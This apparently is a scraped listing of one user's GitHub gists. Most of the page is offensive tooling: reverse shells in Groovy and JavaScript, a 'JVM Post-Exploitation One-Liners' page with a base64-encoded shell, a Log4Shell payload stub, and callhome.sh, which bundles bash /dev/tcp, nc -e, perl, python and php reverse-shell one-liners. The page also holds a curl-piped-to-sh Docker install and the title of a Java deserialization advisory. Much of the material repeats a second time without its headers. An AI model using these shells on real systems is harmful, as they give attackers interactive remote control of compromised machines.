Chris Frohoff frohoff

## revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

## Log4ShellPayload.java
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.core.util.Constants;

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.net.InetAddress;
import java.net.URL;

## terse-rc4.rb
->t,k{s=*0..255;j=0;m=256;m.times{|i|j=(j+s[i]+k[i%k.size])%m;s[i],s[j]=s[j],s[i]};i=j=0;t.map{|b|i=(i+1)%m;j=(j+s[i])%m;s[i],s[j]=s[j],s[i];b^s[(s[i]+s[j])%m]}}

## revsh.js
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();

## JVM_POST_EXPLOIT.md

      
              1 file
            
          
              23 forks
            
          
              2 comments
            
          
              50 stars
            
          
                frohoff
                / JVM_POST_EXPLOIT.md
            
            
              Last active
              December 13, 2023 15:02
            
              
                JVM Post-Exploitation One-Liners
              
          
    Nashorn / Rhino:

Reverse Shell

$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'

Reverse Shell (Base-64 encoded)

$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V

  
## JAVA-ADVISORY.md

      
              1 file
            
          
              9 forks
            
          
              3 comments
            
          
              27 stars
            
          
                frohoff
                / JAVA-ADVISORY.md
            
            
              Last active
              August 28, 2023 19:08
            
              
                Java 7u21 Security Advisory
              
          
    Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management
Introduction


Affected Product(s): Java SE 6, Java SE 7
Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
Vendor Contact: secalert_us@oracle.com
Vulnerability Type: Unsafe Object Deserialization


## ubuntu-docker-compose-up.sh
#!/bin/bash -xe

DEBIAN_FRONTEND=noninteractive apt-get update && apt-get upgrade -y && apt-get -y install git python python-pip

curl -s https://get.docker.com | sh
service docker start

pip install -U docker-compose

mkdir /opt/docker.d

## envoy.yml
static_resources:

  listeners:
  - name: listener_0
    address:
      socket_address:
        address: 0.0.0.0
        port_value: 443
    filter_chains:
    - filters:

## callhome.sh
#!/bin/bash

host=$1
port=$2

bash -i >& /dev/tcp/$host/$port 0>&1
nc -e /bin/sh $host $port
perl -e "use Socket;\$i=\"$host\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$host\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
php -r "\$sock=fsockopen(\"$host\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");"

## 14seg.py
#!/usr/bin/python
# $ echo bcefgG il | python 14seg.py
#
# |   |    |
# -- --
# |   |    |


import string
import sys
	String host="localhost";
	int port=8044;
	String cmd="cmd.exe";
	Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
	import org.apache.logging.log4j.Logger;
	import org.apache.logging.log4j.core.util.Constants;

	import java.io.BufferedReader;
	import java.io.InputStream;
	import java.io.InputStreamReader;
	import java.lang.reflect.Field;
	import java.lang.reflect.Modifier;
	import java.net.InetAddress;
	import java.net.URL;
	var host="localhost";
	var port=8044;
	var cmd="cmd.exe";
	var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
	#!/bin/bash -xe

	DEBIAN_FRONTEND=noninteractive apt-get update && apt-get upgrade -y && apt-get -y install git python python-pip

	curl -s https://get.docker.com \| sh
	service docker start

	pip install -U docker-compose

	mkdir /opt/docker.d
	static_resources:

	listeners:
	- name: listener_0
	address:
	socket_address:
	address: 0.0.0.0
	port_value: 443
	filter_chains:
	- filters:
	#!/bin/bash

	host=$1
	port=$2

	bash -i >& /dev/tcp/$host/$port 0>&1
	nc -e /bin/sh $host $port
	perl -e "use Socket;\$i=\"$host\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"
	python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$host\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
	php -r "\$sock=fsockopen(\"$host\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");"
	#!/usr/bin/python
	# $ echo bcefgG il \| python 14seg.py
	#
	# \| \| \|
	# -- --
	# \| \| \|


	import string
	import sys